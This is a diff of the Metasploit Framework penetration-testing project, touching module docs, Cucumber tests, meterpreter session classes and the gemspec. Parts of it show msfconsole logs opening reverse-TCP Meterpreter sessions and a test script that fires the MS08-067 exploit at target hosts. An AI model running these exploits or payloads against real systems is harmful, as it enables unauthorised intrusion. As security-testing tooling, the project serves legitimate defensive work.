msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easyfilesharing_post) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
meterpreter > sysinfo
Computer : MM
OS : Windows XP (Build 2600, Service Pack 3).
@ -47,7 +47,7 @@ Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
msf exploit(easyfilesharing_post) >
```

View File

@ -1,5 +1,6 @@
## Creating A Testing Environment
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
This module has been tested against:
@ -23,9 +24,10 @@ This module was not tested against, but may work against:
### Windows 10 x64
```
msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:50917) at 2017-03-22 11:43:42 -0500
@ -39,8 +41,8 @@ This module was not tested against, but may work against:
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/archmigrate
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/archmigrate
msf post(archmigrate) > set session 1
session => 1
msf post(archmigrate) > run
@ -70,4 +72,5 @@ This module was not tested against, but may work against:
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
Meterpreter : x64/windows
```

View File

@ -1,111 +0,0 @@
Feature: Help command
Background:
Given I run `msfconsole --defer-module-loads -q -x help -x exit`
Scenario: The 'help' command's output
Then the output should contain:
"""
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
irb Drop into irb scripting mode
load Load a framework plugin
quit Exit the console
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
Module Commands
===============
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
edit Edit the current module with the preferred editor
info Displays information about one or more modules
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Selects a module by name
Job Commands
============
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
Resource Script Commands
========================
Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file
Database Backend Commands
=========================
Command Description
------- -----------
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Credentials Backend Commands
============================
Command Description
------- -----------
creds List all credentials in the database
"""

View File

@ -1,48 +0,0 @@
@targets @db
Feature: MS08-067 netapi
Background:
Given a directory named "home"
And I cd to "home"
And a mocked home directory
Scenario: The MS08-067 should get a session with bind_tcp
Given I ready the windows targets
Given a file named "ms08-067-bind.rc" with:
"""
<ruby>
self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
payload_name = 'windows/meterpreter/bind_tcp'
exploited_hosts = []
failed_hosts = []
hosts.each do |host|
print_status("Trying MS08-067 against #{host['ipAddress']}")
mod = framework.exploits.create('windows/smb/ms08_067_netapi')
mod.datastore['PAYLOAD'] = payload_name
mod.datastore['RHOST'] = host['ipAddress']
m = mod.exploit_simple(
'LocalInput' => nil,
'LocalOutput' => nil,
'Payload' => payload_name,
'RunAsJob' => false
)
sleep(1)
if m
exploited_hosts << host['ipAddress']
else
failed_hosts << host['ipAddress']
end
end
print_status("Exploited hosts: #{exploited_hosts.inspect}")
print_status("Failed hosts: #{failed_hosts.inspect}")
self.run_single('sessions -K')
</ruby>
"""
When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
Then the 'Mdm::Host' table contains the expected targets

View File

@ -1,153 +0,0 @@
@boot
Feature: `msfconsole` `database.yml`
In order to connect to the database in `msfconsole`
As a user calling `msfconsole` from a terminal
I want to be able to set the path of the `database.yml` in one of 4 locations (in order of precedence):
1. An explicit argument to the `-y` flag to `msfconsole`
2. The MSF_DATABASE_CONFIG environment variable
3. The user's `~/.msf4/database.yml`
4. `config/database.yml` in the metasploit-framework checkout location.
Scenario: With all 4 locations, --yaml wins
Given a file named "command_line.yml" with:
"""
test:
adapter: postgresql
database: command_line_metasploit_framework_test
username: command_line_metasploit_framework_test
"""
And a file named "msf_database_config.yml" with:
"""
test:
adapter: postgresql
database: environment_metasploit_framework_test
username: environment_metasploit_framework_test
"""
And I set the environment variables to:
| variable | value |
| MSF_DATABASE_CONFIG | msf_database_config.yml |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit --yaml command_line.yml`
Then the output should contain "command_line_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG wins
Given a file named "msf_database_config.yml" with:
"""
test:
adapter: postgresql
database: environment_metasploit_framework_test
username: environment_metasploit_framework_test
"""
And I set the environment variables to:
| variable | value |
| MSF_DATABASE_CONFIG | msf_database_config.yml |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
Then the output should contain "environment_metasploit_framework_test"
Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
Then the output should contain "user_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
Then the output should contain "project_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG, ~/.msf4/database.yml, or project "database.yml", no database connection
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And I cd to "../.."
And the project "database.yml" does not exist
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
Then the output should not contain "command_line_metasploit_framework_test"
And the output should not contain "environment_metasploit_framework_test"
And the output should not contain "user_metasploit_framework_test"
And the output should not contain "project_metasploit_framework_test"
And the output should contain "[*] postgresql selected, no connection"
Scenario: Starting `msfconsole` with a valid database.yml
When I run `msfconsole -q --defer-module-loads --execute-command db_status --execute-command exit`
Then the output should contain "[*] postgresql connected to metasploit_framework_test"

View File

@ -1,20 +0,0 @@
Given /^I unset the environment variables:$/ do |table|
table.hashes.each do |row|
variable = row['variable'].to_s.upcase
# @todo add extension to Announcer
announcer.instance_eval do
if @options[:env]
print "$ unset #{variable}"
end
end
current_value = ENV.delete(variable)
# if original_env already has the key, then the true original was already recorded from a previous unset or set,
# so don't record the current value as it will cause ENV not to be restored after the Scenario.
unless original_env.key? variable
original_env[variable] = current_value
end
end
end

View File

@ -1,14 +0,0 @@
require 'metasploit/framework/database/cucumber'
Given /^the project "database.yml" does not exist$/ do
Metasploit::Framework::Database::Cucumber.backup_project_configurations
end
Given /^the project "database.yml" exists with:$/ do |file_content|
Metasploit::Framework::Database::Cucumber.backup_project_configurations
File.open(Metasploit::Framework::Database::Cucumber.project_configurations_path, 'wb') { |file| file.write(file_content) }
end
After do
Metasploit::Framework::Database::Cucumber.restore_project_configurations
end

View File

@ -1,26 +0,0 @@
#!/usr/bin/env ruby
case ARGV[0]
when 'size'
puts "30 134"
when '-a'
puts <<EOS
speed 38400 baud; 30 rows; 134 columns;
lflags: icanon isig iexten echo echoe echok echoke -echonl echoctl
-echoprt -altwerase -noflsh -tostop -flusho pendin -nokerninfo
-extproc
iflags: -istrip icrnl -inlcr -igncr ixon -ixoff ixany imaxbel iutf8
-ignbrk brkint -inpck -ignpar -parmrk
oflags: opost onlcr -oxtabs -onocr -onlret
cflags: cread cs8 -parenb -parodd hupcl -clocal -cstopb -crtscts -dsrflow
-dtrflow -mdmbuf
cchars: discard = ^O; dsusp = ^Y; eof = ^D; eol = <undef>;
eol2 = <undef>; erase = ^?; intr = ^C; kill = ^U; lnext = ^V;
min = 1; quit = ^\; reprint = ^R; start = ^Q; status = ^T;
stop = ^S; susp = ^Z; time = 0; werase = ^W;
EOS
when '-g'
puts "gfmt1:cflag=4b00:iflag=6b02:lflag=200005cf:oflag=3:discard=f:dsusp=19:eof=4:eol=ff:eol2=ff:erase=7f:intr=3:kill=15:lnext=16:min=1:quit=1c:reprint=12:start=11:status=14:stop=13:susp=1a:time=0:werase=17:ispeed=38400:ospeed=38400"
end
exit 0

View File

@ -1,34 +0,0 @@
# @note `require 'simplecov'` is not used here because all features currently use external `msfconsole` process, so only
# that child process needs to load 'simplecov'.
# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
# It is recommended to regenerate this file in the future when you upgrade to a
# newer version of cucumber-rails. Consider adding your own code to a new file
# instead of editing this one. Cucumber will automatically load all features/**/*.rb
# files.
require 'cucumber/rails'
require 'aruba/cucumber'
# Capybara defaults to XPath selectors rather than Webrat's default of CSS3. In
# order to ease the transition to Capybara we set the default here. If you'd
# prefer to use XPath just remove this line and adjust any selectors in your
# steps to use the XPath syntax.
Capybara.default_selector = :css
# By default, any exception happening in your Rails application will bubble up
# to Cucumber so that your scenario will fail. This is a different from how
# your application behaves in the production environment, where an error page will
# be rendered instead.
#
# Sometimes we want to override this default behaviour and allow Rails to rescue
# exceptions and display an error page (just like when the app is running in production).
# Typical scenarios where you want to do this is when you test your error pages.
# There are two ways to allow Rails to rescue exceptions:
#
# 1) Tag your scenario (or feature) with @allow-rescue
#
# 2) Set the value below to true. Beware that doing this globally is not
# recommended as it will mask a lot of errors for you!
#
ActionController::Base.allow_rescue = false

View File

@ -1,39 +0,0 @@
Before do
set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
set_env('RAILS_ENV', 'test')
@aruba_timeout_seconds = 8.minutes
end
Before('@db') do |scenario|
dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
ActiveRecord::Base.establish_connection(dbconfig["test"])
end
# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
# unless Bundler.settings.without.include?(:coverage)
# Before do |scenario|
# command_name = case scenario
# when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline
# "#{scenario.feature.title} #{scenario.name}"
# when Cucumber::Ast::OutlineTable::ExampleRow
# scenario_outline = scenario.scenario_outline
#
# "#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}"
# else
# raise TypeError, "Don't know how to extract command name from #{scenario.class}"
# end
#
# # Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead
# # of overwriting each other as 'Cucumber Features'
# set_env('SIMPLECOV_COMMAND_NAME', command_name)
#
# simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup')
# # set environment variable so child processes will merge their coverage data with parent process's coverage data.
# set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}")
# end
#
# Before('@db') do |scenario|
# dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
# ActiveRecord::Base.establish_connection(dbconfig["test"])
# end
# end

View File

@ -1,16 +0,0 @@
# @note this file is loaded in env.rb to setup simplecov using RUBYOPTs for child processes
simplecov_command_name = ENV['SIMPLECOV_COMMAND_NAME']
# will not be set if hook does not run because `bundle install --without coverage`
if simplecov_command_name
require 'simplecov'
require 'pathname'
root = Pathname(__FILE__).expand_path.parent.parent.parent
SimpleCov.command_name(simplecov_command_name)
SimpleCov.root(root)
load root.join('.simplecov')
end

View File

@ -1,11 +0,0 @@
require 'pathname'
support = Pathname.new(__FILE__).realpath.parent
paths = [
# adds support/bin at the front of the path so that the support/bin/stty script will be used to fake system stty
# output.
support.join('bin').to_path,
ENV['PATH']
]
ENV['PATH'] = paths.join(File::PATH_SEPARATOR)

View File

@ -1,7 +0,0 @@
windows:
-
hostname: wxpsp0
ip: 127.0.0.100
-
hostname: wxpsp2
ip: 127.0.0.101

View File

@ -1,36 +0,0 @@
require 'metasploit/framework/database'
module Metasploit::Framework::Database::Cucumber
def self.project_configurations_path
Rails.root.join('config', 'database.yml').to_path
end
def self.backup_project_configurations
if File.exist?(project_configurations_path)
# assume that the backup file is from a previously aborted run and it contains the real database.yml data, so
# just delete the fake database.yml and the After hook will restore the real database.yml from the backup location
if File.exist?(backup_project_configurations_path)
File.delete(project_configurations_path)
else
# project contains the real database.yml and there was no previous, aborted run.
File.rename(project_configurations_path, backup_project_configurations_path)
end
end
end
def self.backup_project_configurations_path
"#{project_configurations_path}.cucumber.bak"
end
def self.restore_project_configurations
if File.exist?(backup_project_configurations_path)
if File.exist?(project_configurations_path)
# Remove fake, leftover database.yml
File.delete(project_configurations_path)
end
File.rename(backup_project_configurations_path, project_configurations_path)
end
end
end

View File

@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.15.1"
VERSION = "4.15.4"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash

View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'osx'
self.base_arch = ARCH_X64
end
end
end
end

View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'osx'
self.base_arch = ARCH_X86
end
end
end
end

View File

@ -810,6 +810,7 @@ module Msf
%Q|<html>
<head>
<meta http-equiv="cache-control" content="no-cache" />
<script>
#{js}
</script>

View File

@ -32,6 +32,7 @@ module Exploit::Remote::HttpServer
register_evasion_options(
[
OptBool.new('HTTP::no_cache', [false, 'Disallow the browser to cache HTTP content', false]),
OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]),
OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]),
OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]),
@ -558,6 +559,10 @@ module Exploit::Remote::HttpServer
response.headers.junk_headers = 1
end
if datastore['HTTP::no_cache']
response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate'
end
headers.each_pair { |k,v| response[k] = v }
cli.send_response(response)

12
lib/msf/core/exploit/smtp_deliver.rb Normal file → Executable file
View File

@ -184,7 +184,7 @@ module Exploit::Remote::SMTPDeliver
raw_send_recv("MAIL FROM: <#{mailfrom}>\r\n", nsock)
res = raw_send_recv("RCPT TO: <#{mailto}>\r\n", nsock)
if res[0..2] == '250'
if res && res[0..2] == '250'
resp = raw_send_recv("DATA\r\n", nsock)
# If the user supplied a Date field, use that, else use the current
@ -242,10 +242,12 @@ module Exploit::Remote::SMTPDeliver
# to dump it all.
vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}")
end
nsock.put(cmd)
res = nsock.get_once
begin
nsock.put(cmd)
res = nsock.get_once
rescue
return nil
end
# Don't truncate the server output because it might be helpful for
# debugging.
vprint_status("S: #{res.strip}") if res

View File

@ -173,7 +173,8 @@ class Msf::Modules::Loader::Base
true
}
loaded = namespace_module_transaction(type + "/" + module_reference_name, :reload => reload, &try_eval_module)
loaded = namespace_module_transaction(type + "/" + module_reference_name,
:reload => reload, &try_eval_module)
unless loaded
return false
end

View File

@ -28,12 +28,11 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
def each_module_reference_name(path, opts={})
whitelist = opts[:whitelist] || []
::Dir.foreach(path) do |entry|
full_entry_path = ::File.join(path, entry)
type = entry.singularize
unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
next
end
next unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
full_entry_pathname = Pathname.new(full_entry_path)
@ -43,6 +42,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
entry_descendant_pathname = Pathname.new(entry_descendant_path)
relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
next if File::basename(relative_entry_descendant_path) == "example.rb"
# The module_reference_name doesn't have a file extension
module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)

View File

@ -103,7 +103,7 @@ module Msf::Payload::Php
}else"
proc_open = "
if(#{is_callable}('proc_open')and!#{in_array}('proc_open',#{dis})){
$handle=proc_open(#{cmd},array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);
$handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
#{output}=NULL;
while(!feof($pipes[1])){
#{output}.=fread($pipes[1],1024);

View File

@ -278,6 +278,16 @@ module RFTransceiver
return_success(r)
end
#
# Sets lowball. Ensure you set the frequency first before using this
# @return [Boolean] success value
def set_lowball
return false unless is_rf?
self.index ||= 0
r = client.rftransceiver.set_lowball(self.index)
return_success(r)
end
#
# Set power level
# @param level [Integer] Power level

View File

@ -21,3 +21,4 @@ end
# Executable generation and encoding
require 'msf/util/exe'
require 'msf/util/helper'

View File

@ -106,7 +106,7 @@ require 'msf/core/exe/segment_appender'
# @return [String]
# @return [NilClass]
def self.to_executable(framework, arch, plat, code = '', opts = {})
if elf? code
if elf? code or macho? code
return code
end
@ -2148,15 +2148,19 @@ require 'msf/core/exe/segment_appender'
end
end
when 'macho', 'osx-app'
macho = case arch
when ARCH_X86,nil
to_osx_x86_macho(framework, code, exeopts)
when ARCH_X64
to_osx_x64_macho(framework, code, exeopts)
when ARCH_ARMLE
to_osx_arm_macho(framework, code, exeopts)
when ARCH_PPC
to_osx_ppc_macho(framework, code, exeopts)
if macho? code
macho = code
else
macho = case arch
when ARCH_X86,nil
to_osx_x86_macho(framework, code, exeopts)
when ARCH_X64
to_osx_x64_macho(framework, code, exeopts)
when ARCH_ARMLE
to_osx_arm_macho(framework, code, exeopts)
when ARCH_PPC
to_osx_ppc_macho(framework, code, exeopts)
end
end
fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho
when 'vba'
@ -2284,6 +2288,10 @@ require 'msf/core/exe/segment_appender'
code[0..3] == "\x7FELF"
end
def self.macho?(code)
code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE"
end
end
end
end

21
lib/msf/util/helper.rb Normal file
View File

@ -0,0 +1,21 @@
# -*- coding: binary -*-
module Msf
module Util
class Helper
# Cross-platform way of finding an executable in the $PATH.
#
# which('ruby') #=> /usr/bin/ruby
def self.which(cmd)
exts = ENV['PATHEXT'] ? ENV['PATHEXT'].split(';') : ['']
ENV['PATH'].split(File::PATH_SEPARATOR).each do |path|
exts.each { |ext|
exe = File.join(path, "#{cmd}#{ext}")
return exe if File.executable?(exe) && !File.directory?(exe)
}
end
return nil
end
end
end
end

View File

@ -186,6 +186,10 @@ class RFTransceiver < Extension
client.send_request("/rftransceiver/#{idx}/set_number_preamble?num=#{num}")
end
def set_lowball(idx)
client.send_request("/rftransceiver/#{idx}/set_lowball")
end
def set_maxpower(idx)
client.send_request("/rftransceiver/#{idx}/set_maxpower")
end

View File

@ -34,6 +34,7 @@ class Console::CommandDispatcher::RFtransceiver
'deviation' => 'sets the deviation',
'sync_word' => 'sets the sync word',
'preamble' => 'sets the preamble number',
'lowball' => 'sets lowball',
'power' => 'sets the power level',
'maxpower' => 'sets max power'
}
@ -528,6 +529,20 @@ class Console::CommandDispatcher::RFtransceiver
print_success(r)
end
def cmd_lowball_help
print_line("Lowball is frequency dependent. Set frequency first")
end
def cmd_lowball(*args)
self.idx ||= 0
if args.length.positive?
cmd_lowball_help
return
end
r = client.rftransceiver.set_lowball(idx)
print_success(r)
end
def cmd_maxpower_help
print_line("Max power is frequency dependent. Set frequency first")
end

View File

@ -195,19 +195,15 @@ class Dir < Rex::Post::Dir
# Downloads the contents of a remote directory a
# local directory, optionally in a recursive fashion.
#
def Dir.download(dst, src, opts, force = true, glob = nil, &stat)
recursive = false
continue = false
tries = false
tries_no = 0
def Dir.download(dst, src, opts = {}, force = true, glob = nil, &stat)
tries_cnt = 0
if opts
timestamp = opts["timestamp"]
recursive = true if opts["recursive"]
continue = true if opts["continue"]
tries = true if opts["tries"]
tries_no = opts["tries_no"]
end
continue = opts["continue"]
recursive = opts["recursive"]
timestamp = opts["timestamp"]
tries_no = opts["tries_no"] || 0
tries = opts["tries"]
begin
dir_files = self.entries(src, glob)
rescue Rex::TimeoutError

View File

@ -301,8 +301,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
# If a block is given, it will be called before each file is downloaded and
# again when each download is complete.
#
def File.download(dest, src_files, opts = nil, &stat)
timestamp = opts["timestamp"] if opts
def File.download(dest, src_files, opts = {}, &stat)
timestamp = opts["timestamp"]
[*src_files].each { |src|
if (::File.basename(dest) != File.basename(src))
# The destination when downloading is a local file so use this
@ -324,18 +324,15 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
#
# Download a single file.
#
def File.download_file(dest_file, src_file, opts = nil, &stat)
continue=false
tries=false
tries_no=0
def File.download_file(dest_file, src_file, opts = {}, &stat)
stat ||= lambda { |a,b,c| }
if opts
continue = true if opts["continue"]
adaptive = true if opts['adaptive']
tries = true if opts["tries"]
tries_no = opts["tries_no"]
end
adaptive = opts["adaptive"]
block_size = opts["block_size"] || 1024 * 1024
continue = opts["continue"]
tries_no = opts["tries_no"]
tries = opts["tries"]
src_fd = client.fs.file.new(src_file, "rb")
# Check for changes
@ -373,7 +370,6 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
end
# Keep transferring until EOF is reached...
block_size = (opts && opts['block_size']) || 1024 * 1024
begin
if tries
# resume when timeouts encountered

View File

@ -259,7 +259,7 @@ class Console::CommandDispatcher::Stdapi::Sys
print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
cmd_execute("-f", path, "-c", "-H", "-i")
end
when 'linux'
when 'linux', 'osx'
# Don't expand_path() this because it's literal anyway
path = "/bin/sh"
cmd_execute("-f", path, "-c", "-i")

View File

@ -1,74 +0,0 @@
# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
# It is recommended to regenerate this file in the future when you upgrade to a
# newer version of cucumber-rails. Consider adding your own code to a new file
# instead of editing this one. Cucumber will automatically load all features/**/*.rb
# files.
unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks
vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first
$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil?
begin
require 'cucumber/rake/task'
namespace :cucumber do
Cucumber::Rake::Task.new({:ok => 'db:test:prepare'}, 'Run features that should pass') do |t|
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
t.fork = true # You may get faster startup if you set this to false
t.profile = 'default'
end
Cucumber::Rake::Task.new({:wip => 'db:test:prepare'}, 'Run features that are being worked on') do |t|
t.binary = vendored_cucumber_bin
t.fork = true # You may get faster startup if you set this to false
t.profile = 'wip'
end
Cucumber::Rake::Task.new({:rerun => 'db:test:prepare'}, 'Record failing features and run only them if any exist') do |t|
t.binary = vendored_cucumber_bin
t.fork = true # You may get faster startup if you set this to false
t.profile = 'rerun'
end
desc 'Run all features'
task :all => [:ok, :wip]
task :statsetup do
require 'rails/code_statistics'
::STATS_DIRECTORIES << %w(Cucumber\ features features) if File.exist?('features')
::CodeStatistics::TEST_TYPES << "Cucumber features" if File.exist?('features')
end
end
desc 'Alias for cucumber:ok'
task :cucumber => 'cucumber:ok'
task :default => :cucumber
task :features => :cucumber do
STDERR.puts "*** The 'features' task is deprecated. See rake -T cucumber ***"
end
# In case we don't have ActiveRecord, append a no-op task that we can depend upon.
task 'db:test:prepare' do
end
task 'db:config:restore' do
require 'metasploit/framework/database/cucumber'
Metasploit::Framework::Database::Cucumber.restore_project_configurations
end
# Restore the config/database.yml from config/database.cucumber.yml before attempting to copy development to test
# database in order to recover from interrupted cucumber runs
task 'environment' => 'db:config:restore'
task :stats => 'cucumber:statsetup'
rescue LoadError
desc 'cucumber rake task not available (cucumber not installed)'
task :cucumber do
abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin'
end
end
end

View File

@ -1,30 +0,0 @@
unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks
vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first
$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil?
begin
require 'cucumber/rake/task'
namespace :cucumber do
Cucumber::Rake::Task.new({:boot => 'db:test:prepare'}, 'Run features that should pass') do |t|
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
t.fork = true # You may get faster startup if you set this to false
t.profile = 'boot'
end
Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t|
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
t.fork = true # You may get faster startup if you set this to false
t.profile = 'exploit'
end
end
rescue LoadError
desc 'cucumber rake task not available (cucumber not installed)'
task :cucumber do
abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin'
end
end
end

View File

@ -13,6 +13,7 @@ end
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'metasploit/framework/version'
require 'metasploit/framework/rails_version_constraint'
require 'msf/util/helper'
Gem::Specification.new do |spec|
spec.name = 'metasploit-framework'
@ -24,7 +25,8 @@ Gem::Specification.new do |spec|
spec.homepage = 'https://www.metasploit.com'
spec.license = 'BSD-3-clause'
if File.directory?(File.join(File.dirname(__FILE__), ".git"))
# only do a git ls-files if the .git folder exists and we have a git binary in PATH
if File.directory?(File.join(File.dirname(__FILE__), ".git")) && Msf::Util::Helper.which("git")
spec.files = `git ls-files`.split($/).reject { |file|
file =~ /^documentation|^external/
}
@ -68,9 +70,9 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.2.37'
spec.add_runtime_dependency 'metasploit-payloads', '1.2.42'
# Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.10'
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# get list of network interfaces, like eth* from OS.
@ -134,7 +136,7 @@ Gem::Specification.new do |spec|
# Library for Generating Randomized strings valid as Identifiers such as variable names
spec.add_runtime_dependency 'rex-random_identifier'
# library for creating Powershell scripts for exploitation purposes
spec.add_runtime_dependency 'rex-powershell'
spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"]
